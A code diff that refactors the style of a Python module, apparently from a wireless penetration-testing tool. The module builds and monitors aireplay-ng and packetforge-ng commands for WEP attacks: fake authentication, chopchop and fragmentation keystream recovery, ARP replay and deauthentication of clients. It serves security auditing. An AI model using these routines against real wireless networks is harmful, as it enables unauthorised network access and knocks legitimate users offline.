@@ -13,7 +13,7 @@ from threading import Thread
 
 
 class WEPAttackType(object):
-    ''' Enumeration of different WEP attack types '''
+    """ Enumeration of different WEP attack types """
     fakeauth = 0
     replay = 1
     chopchop = 2
@@ -24,12 +24,12 @@ class WEPAttackType(object):
     forgedreplay = 7
 
     def __init__(self, var):
-        '''
+        """
             Sets appropriate attack name/value given an input.
             Args:
                 var - Can be a string, number, or WEPAttackType object
                       This object's name & value is set depending on var.
-        '''
+        """
         self.value = None
         self.name = None
         if type(var) is int:
@@ -64,40 +64,43 @@ class Aireplay(Thread, Dependency):
     dependency_url = 'https://www.aircrack-ng.org/install.html'
 
     def __init__(self, target, attack_type, client_mac=None, replay_file=None):
-        '''
+        """
             Starts aireplay process.
             Args:
                 target - Instance of Target object, AP to attack.
                 attack_type - str, e.g. 'fakeauth', 'arpreplay', etc.
                 client_mac - MAC address of an associated client.
-        '''
+        """
         super(Aireplay, self).__init__()  # Init the parent Thread
 
-        self.target = target
-        self.output_file = Configuration.temp('aireplay_%s.output' % attack_type)
-        self.attack_type = WEPAttackType(attack_type).value
         self.error = None
         self.status = None
+        self.stdout = None
+        self.xor_percent = None
+
+        self.target = target
+        self.output_file = Configuration.temp(f'aireplay_{attack_type}.output')
+        self.attack_type = WEPAttackType(attack_type).value
         self.cmd = Aireplay.get_aireplay_command(self.target,
-                                            attack_type,
-                                            client_mac=client_mac,
-                                            replay_file=replay_file)
+                                                 attack_type,
+                                                 client_mac=client_mac,
+                                                 replay_file=replay_file)
         self.pid = Process(self.cmd,
-                stdout=open(self.output_file, 'a'),
-                stderr=Process.devnull(),
-                cwd=Configuration.temp())
+                           stdout=open(self.output_file, 'a'),
+                           stderr=Process.devnull(),
+                           cwd=Configuration.temp())
         self.start()
 
     def is_running(self):
         return self.pid.poll() is None
 
     def stop(self):
-        ''' Stops aireplay process '''
+        """ Stops aireplay process """
         if hasattr(self, 'pid') and self.pid and self.pid.poll() is None:
             self.pid.interrupt()
 
     def get_output(self):
-        ''' Returns stdout from aireplay process '''
+        """ Returns stdout from aireplay process """
         return self.stdout
 
     def run(self):
@@ -128,45 +131,38 @@ class Aireplay(Thread, Dependency):
                 if self.attack_type == WEPAttackType.fakeauth:
                     # Look for fakeauth status. Potential Output lines:
                     # (START): 00:54:58  Sending Authentication Request (Open System)
-                    if 'Sending Authentication Request ' in line:
+                    if 'Sending Authentication Request ' in line or 'Please specify an ESSID' in line:
                         self.status = None  # Reset
-                    # (????):  Please specify an ESSID (-e).
-                    elif 'Please specify an ESSID' in line:
-                        self.status = None
-                    # (FAIL):  00:57:43  Got a deauthentication packet! (Waiting 3 seconds)
                     elif 'Got a deauthentication packet!' in line:
                         self.status = False
-                    # (PASS):  20:17:25  Association successful :-) (AID: 1)
-                    # (PASS):  20:18:55  Reassociation successful :-) (AID: 1)
-                    elif 'association successful :-)' in line.lower():
+                    elif 'Sending Authentication Request ' not in line \
+                            and 'Please specify an ESSID' not in line \
+                            and 'Got a deauthentication packet!' not in line \
+                            and 'association successful :-)' in line.lower():
                         self.status = True
                 elif self.attack_type == WEPAttackType.chopchop:
                     # Look for chopchop status. Potential output lines:
 
                     # (START)  Read 178 packets...
                     read_re = re.compile(r'Read (\d+) packets')
-                    matches = read_re.match(line)
-                    if matches:
-                        self.status = 'Waiting for packet (read %s)...' % matches.group(1)
+                    if matches := read_re.match(line):
+                        self.status = f'Waiting for packet (read {matches[1]})...'
 
                     # Sent 1912 packets, current guess: 70...
                     sent_re = re.compile(r'Sent (\d+) packets, current guess: (\w+)...')
-                    matches = sent_re.match(line)
-                    if matches:
-                        self.status = 'Generating .xor (%s)... current guess: %s' % (self.xor_percent, matches.group(2))
+                    if matches := sent_re.match(line):
+                        self.status = f'Generating .xor ({self.xor_percent})... current guess: {matches[2]}'
 
                     # (DURING) Offset   52 (54% done) | xor = DE | pt = E0 |  152 frames written in  2782ms
                     offset_re = re.compile(r'Offset.*\(\s*(\d+%) done\)')
-                    matches = offset_re.match(line)
-                    if matches:
-                        self.xor_percent = matches.group(1)
-                        self.status = 'Generating .xor (%s)...' % self.xor_percent
+                    if matches := offset_re.match(line):
+                        self.xor_percent = matches[1]
+                        self.status = f'Generating .xor ({self.xor_percent})...'
 
                     # (DONE)   Saving keystream in replay_dec-0516-202246.xor
                     saving_re = re.compile(r'Saving keystream in (.*\.xor)')
-                    matches = saving_re.match(line)
-                    if matches:
-                        self.status = matches.group(1)
+                    if matches := saving_re.match(line):
+                        self.status = matches[1]
 
                     # (ERROR) fakeauth required
                     if 'try running aireplay-ng in authenticated mode' in line:
@@ -177,9 +173,8 @@ class Aireplay(Thread, Dependency):
 
                     # (START)  Read 178 packets...
                     read_re = re.compile(r'Read (\d+) packets')
-                    matches = read_re.match(line)
-                    if matches:
-                        self.status = 'Waiting for packet (read %s)...' % matches.group(1)
+                    if matches := read_re.match(line):
+                        self.status = f'Waiting for packet (read {matches[1]})...'
 
                     # 01:08:15  Waiting for a data packet...
                     if 'Waiting for a data packet' in line:
@@ -187,9 +182,8 @@ class Aireplay(Thread, Dependency):
 
                     # Read 207 packets...
                     trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream')
-                    matches = trying_re.match(line)
-                    if matches:
-                        self.status = 'trying to get %sb of a keystream' % matches.group(1)
+                    if matches := trying_re.match(line):
+                        self.status = f'trying to get {matches[1]}b of a keystream'
 
                     # 01:08:17  Sending fragmented packet
                     if 'Sending fragmented packet' in line:
@@ -201,9 +195,8 @@ class Aireplay(Thread, Dependency):
 
                     # XX:XX:XX  Trying to get 1500 bytes of a keystream
                     trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream')
-                    matches = trying_re.match(line)
-                    if matches:
-                        self.status = 'trying to get %sb of a keystream' % matches.group(1)
+                    if matches := trying_re.match(line):
+                        self.status = f'trying to get {matches[1]}b of a keystream'
 
                     # XX:XX:XX  Got RELAYED packet!!
                     if 'Got RELAYED packet' in line:
@@ -215,48 +208,43 @@ class Aireplay(Thread, Dependency):
 
                     # XX:XX:XX  Saving keystream in fragment-0124-161129.xor
                     saving_re = re.compile(r'Saving keystream in (.*\.xor)')
-                    matches = saving_re.match(line)
-                    if matches:
-                        self.status = 'saving keystream to %s' % matches.group(1)
-
-                    # XX:XX:XX  Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
+                    if matches := saving_re.match(line):
+                        self.status = f'saving keystream to {matches[1]}'
+                        # XX:XX:XX  Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
 
                 else:  # Replay, forged replay, etc.
                     # Parse Packets Sent & PacketsPerSecond. Possible output lines:
                     # Read 55 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
                     # Read 4467 packets (got 1425 ARP requests and 1417 ACKs), sent 1553 packets...(100 pps)
-                    read_re = re.compile(r'Read (\d+) packets \(got (\d+) ARP requests and (\d+) ACKs\), sent (\d+) packets...\((\d+) pps\)')
-                    matches = read_re.match(line)
-                    if matches:
-                        pps = matches.group(5)
+                    read_re = re.compile(r'Read (\d+) packets \(got (\d+) ARP requests '
+                                         r'and (\d+) ACKs\), sent (\d+) packets...\((\d+) pps\)')
+                    if matches := read_re.match(line):
+                        pps = matches[5]
                         if pps == '0':
                             self.status = 'Waiting for packet...'
                         else:
-                            self.status = 'Replaying @ %s/sec' % pps
-                    pass
+                            self.status = f'Replaying @ {pps}/sec'
 
     def __del__(self):
         self.stop()
 
     @staticmethod
-    def get_aireplay_command(target, attack_type,
-                             client_mac=None, replay_file=None):
-        '''
+    def get_aireplay_command(target, attack_type, client_mac=None, replay_file=None):
+        """
             Generates aireplay command based on target and attack type
             Args:
                 target      - Instance of Target object, AP to attack.
                 attack_type - int, str, or WEPAttackType instance.
                 client_mac  - MAC address of an associated client.
                 replay_file - .Cap file to replay via --arpreplay
-        '''
+        """
 
         # Interface is required at this point
         Configuration.initialize()
         if Configuration.interface is None:
             raise Exception('Wireless interface must be defined (-i)')
 
-        cmd = ['aireplay-ng']
-        cmd.append('--ignore-negative-one')
+        cmd = ['aireplay-ng', '--ignore-negative-one']
 
         if client_mac is None and len(target.clients) > 0:
             # Client MAC wasn't specified, but there's an associated client. Use that.
@@ -290,7 +278,7 @@ class Aireplay(Thread, Dependency):
                 '-x', str(Configuration.wep_pps),
                 # '-m', '60', # Minimum packet length (bytes)
                 # '-n', '82', # Maximum packet length
-                '-F'        # Automatically choose first packet
+                '-F'  # Automatically choose first packet
             ])
             if client_mac:
                 cmd.extend(['-h', client_mac])
@@ -301,7 +289,7 @@ class Aireplay(Thread, Dependency):
                 '-b', target.bssid,
                 '-x', str(Configuration.wep_pps),
                 '-m', '100',  # Minimum packet length (bytes)
-                '-F'          # Automatically choose first packet
+                '-F'  # Automatically choose first packet
             ])
             if client_mac:
                 cmd.extend(['-h', client_mac])
@@ -355,39 +343,38 @@ class Aireplay(Thread, Dependency):
 
     @staticmethod
     def get_xor():
-        ''' Finds the last .xor file in the directory '''
+        """ Finds the last .xor file in the directory """
         xor = None
         for fil in os.listdir(Configuration.temp()):
             if fil.startswith('replay_') and fil.endswith('.xor') or \
-               fil.startswith('fragment-') and fil.endswith('.xor'):
+                    fil.startswith('fragment-') and fil.endswith('.xor'):
                 xor = fil
         return xor
 
     @staticmethod
     def forge_packet(xor_file, bssid, station_mac):
-        ''' Forges packet from .xor file '''
+        """ Forges packet from .xor file """
         forged_file = 'forged.cap'
         cmd = [
             'packetforge-ng',
             '-0',
-            '-a', bssid,            # Target MAC
-            '-h', station_mac,      # Client MAC
-            '-k', '192.168.1.2',    # Dest IP
+            '-a', bssid,  # Target MAC
+            '-h', station_mac,  # Client MAC
+            '-k', '192.168.1.2',  # Dest IP
             '-l', '192.168.1.100',  # Source IP
-            '-y', xor_file,         # Read PRNG from .xor file
-            '-w', forged_file,      # Write to
+            '-y', xor_file,  # Read PRNG from .xor file
+            '-w', forged_file,  # Write to
             Configuration.interface
         ]
 
         cmd = '"%s"' % '" "'.join(cmd)
         (out, err) = Process.call(cmd, cwd=Configuration.temp(), shell=True)
-        if out.strip() == 'Wrote packet to: %s' % forged_file:
+        if out.strip() == f'Wrote packet to: {forged_file}':
             return forged_file
-        else:
-            from ..util.color import Color
-            Color.pl('{!} {R}failed to forge packet from .xor file{W}')
-            Color.pl('output:\n"%s"' % out)
-            return None
+        from ..util.color import Color
+        Color.pl('{!} {R}failed to forge packet from .xor file{W}')
+        Color.pl('output:\n"%s"' % out)
+        return None
 
     @staticmethod
     def deauth(target_bssid, essid=None, client_mac=None, num_deauths=None, timeout=2):
@@ -414,7 +401,7 @@ class Aireplay(Thread, Dependency):
 
     @staticmethod
     def fakeauth(target, timeout=5, num_attempts=3):
-        '''
+        """
         Tries a one-time fake-authenticate with a target AP.
         Params:
             target (py.Target): Instance of py.Target
@@ -422,7 +409,7 @@ class Aireplay(Thread, Dependency):
             num_attempts (int): Number of fakeauth attempts to make.
         Returns:
             (bool): True if fakeauth succeeds, otherwise False
-        '''
+        """
 
         cmd = [
             'aireplay-ng',
@@ -434,8 +421,8 @@ class Aireplay(Thread, Dependency):
             cmd.extend(['-e', target.essid])
         cmd.append(Configuration.interface)
         fakeauth_proc = Process(cmd,
-                devnull=False,
-                cwd=Configuration.temp())
+                                devnull=False,
+                                cwd=Configuration.temp())
 
         timer = Timer(timeout)
         while fakeauth_proc.poll() is None and not timer.ended():
